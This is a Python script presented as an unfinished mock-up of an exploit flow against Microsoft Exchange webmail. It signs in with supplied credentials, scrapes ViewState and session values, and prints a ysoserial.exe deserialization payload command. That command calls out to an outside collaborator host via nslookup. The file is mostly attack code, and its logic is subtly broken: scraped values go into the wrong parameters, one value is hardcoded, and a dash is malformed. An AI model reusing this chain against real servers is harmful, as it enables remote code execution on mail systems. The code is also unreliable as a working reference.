#
# THIS WILL NOT WORK IT NEEDS WORK
#
#
# This is a mock-up of an exploit flow. I need a system I can test this on to make it work, but here is the base code to get somewhere.
#
# By Random_Robbie
#
#
import requests
import argparse
import re
# Mock-up flow (the file header states it does not work as written):
#   1. sign in to the forms login with caller-supplied credentials,
#   2. scrape two values out of the login response,
#   3. PRINT a ysoserial.exe command line built from those values.
# This script executes nothing itself and sends no request after the login POST.
cli = argparse.ArgumentParser()
cli.add_argument("-s", "--server", required=True, help="ECP Server")
cli.add_argument("-u", "--user", required=True, help="Email Address")
# NOTE(review): a password given as a command-line argument is exposed through
# shell history and the process list on the machine running the script.
cli.add_argument("-p", "--password", required=True, help="Password")
args = cli.parse_args()

owa_login_form_url = args.server
user_name = args.user
pwd = args.password

session = requests.Session()

# Login form fields; the insertion order is the order they are encoded in.
login_form = {
    "password": pwd,
    "isUtf8": "1",
    "passwordText": "",
    "trusted": "4",
    "destination": owa_login_form_url,
    "flags": "4",
    "forcedownlevel": "0",
    "username": user_name,
}

# Fixed, browser-style header set: every request from this script carries the
# same User-Agent and "Connection: close".
request_headers = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0",
    "Connection": "close",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
}
request_cookies = {"PBack": "0", "PrivateComputer": "true"}

# The server argument is concatenated as-is, so it has to end with the path
# separator the caller intends; no URL normalisation is done here.
login_url = owa_login_form_url + "auth.owa"
response = session.post(
    login_url,
    data=login_form,
    headers=request_headers,
    cookies=request_cookies,
)
print("Status code: %i" % response.status_code)

login_rejected = "reason=2" in response.text
if not login_rejected:
    # Any response without the "reason=2" marker lands here, whether or not
    # the sign-in really succeeded.
    page_body = str(response.text)
    header_dump = str(response.headers)

    # findall(...)[0] raises IndexError when the marker is missing from the
    # response; the script has no handling for that case.
    generator_value = re.findall(
        'id="__VIEWSTATEGENERATOR" value="(.+?)"', page_body
    )[0]
    session_id = re.findall('ASP.NET_SessionId=(.+?) Time', header_dump)[0]

    # Only a string is assembled and printed; the scraped values are inserted
    # verbatim, without quoting or validation.
    command_parts = (
        'ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey=',
        generator_value,
        ' --generator="B97B4E27" --viewstateuserkey=',
        session_id,
        ' --isdebug –islegacy',
    )
    print("".join(command_parts))
else:
    print("Login Incorrect")